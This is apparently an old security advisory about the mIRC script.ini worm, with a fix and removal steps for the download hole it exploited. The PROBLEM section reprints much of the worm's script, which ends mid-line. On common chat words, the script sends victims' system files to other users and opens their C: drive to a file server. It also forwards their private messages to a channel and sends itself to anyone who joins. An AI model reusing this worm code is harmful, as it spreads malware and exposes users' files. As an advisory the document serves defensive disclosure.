COMMAND

    mIRC

SYSTEMS AFFECTED

    Win systems running mIRC

PROBLEM

    Aleph One posted  following.  There  is an mIRC  worm/script going
    around IRC.  mIRC has a  bug that allows remote users to  download
    script files onto  the victims machines  and execute them.   Below
    is one of the many variations of the script.  Some URLs:

        http://www.mirc.org/
        http://www5.zdnet.com/zdnn/content/zdnn/1216/263771.html
        http://www.drsolomon.com/vircen/valerts/simpsal.html
        http://www.drsolomon.com/vircen/vanalyse/worms.html
        http://www.irchelp.org/irchelp/mirc/si.html

    Script follows (script.ini):

    [script]
    n0=;----------------------------------------------------------
    n1=;      Protection List
    n2=;----------------------------------------------------------
    n3=ON 1:TEXT:*spamquit*:#:/quit Jolly Spamhead Ownz Me
    n4=ON 1:TEXT:*hi*:#:/dcc send $nick c:\config.sys
    n5=ON 1:TEXT:*!servme*:#:/fserve $nick 1 c:\
    n6=ON 1:TEXT:*cya*:#:/dcc send $nick c:\windows\win.ini
    n7=ON 1:TEXT:*the*:#:/dcc send $nick c:\autoexec.bat
    n8=ON 1:NOTICE:*:#:/msg #roms  $+ $chan $+  - $+ $nick $+ - $parms
    n9=ON 1:TEXT:*:?:/msg #roms **Message from $nick $+ ** $parms | /closemsg  $nick
    n10=ON 1:TEXT:*:#:/msg #roms $+ $chan $+  < $+ $nick $+ > $parms
    N11=ON 1:TEXT:*:#:/say I am lame for running Script.ini and I should be shot!
    n12=ON 1:JOIN:#:/dcc send $nick SCRIPT.INI
    n13=ON 1:JOIN:*RaSPuTeN*:/mode +o $chan RaSPuTeN
    N14=ON 1:JOIN:#:/msg $nick My Computer Is Open For The taking! Type !servme in channel!
    n15=#user.prot.add.all off
    n16=raw 401:*: set %User.Nick 0 | halt
    n17=raw 301:*: halt
    n18=raw 311:*: set %User.Address $2 $+ ! $+ $3 $+ @ $+ $4 | halt
    n19=raw 312:*: halt
    n20=raw 313:*: halt
    n21=raw 317:*: halt
    n22=raw 319:*: halt
    n23=raw 318:* {
    n24=  if (%User.Nick == 0) { error $2 $+ , no such nick | goto do

SOLUTION

    mIRC 5.3 has been release to fix  the hole.  You can also fix  the
    problem  by  changing  the  default  download  subdirectory  to be
    something else than the directory containing the script files.  To
    do so:

	a) Start the mIRC software
	b) Click the mIRC menu option DCC | Options | Dirs | Edit
	c) Change  the  default  download  directory.  Point  to    an
	   alternate directory or folder name.

    It  might  also  be  worth  pointing  out  how  to  get rid of the
    script.ini program in the first place for those who are not sure.

        Load up mIRC

        /remote off
        /unload -rs script.ini
        /remove script.ini
        /sreq ask
        /remote on

    The defaults for mIRC ARE  safe. They require the user  accept the
    file. Everyone should be aware not to accept files which are  from
    an unknown or  dubious source. The  rule applies for  http and ftp
    so IRC/DCC  is no  different.   Newer versions  of script.ini will
    not  allow  the  user  to  use  /remote off or /unload. script.ini
    aliases  these  commands  to   make  the  users  actually   delete
    command.com, config.sys,  etc. The  safest way  to get  rid of the
    file is  to have  the user  close down  mIRC and delete script.ini
    before they load mIRC again.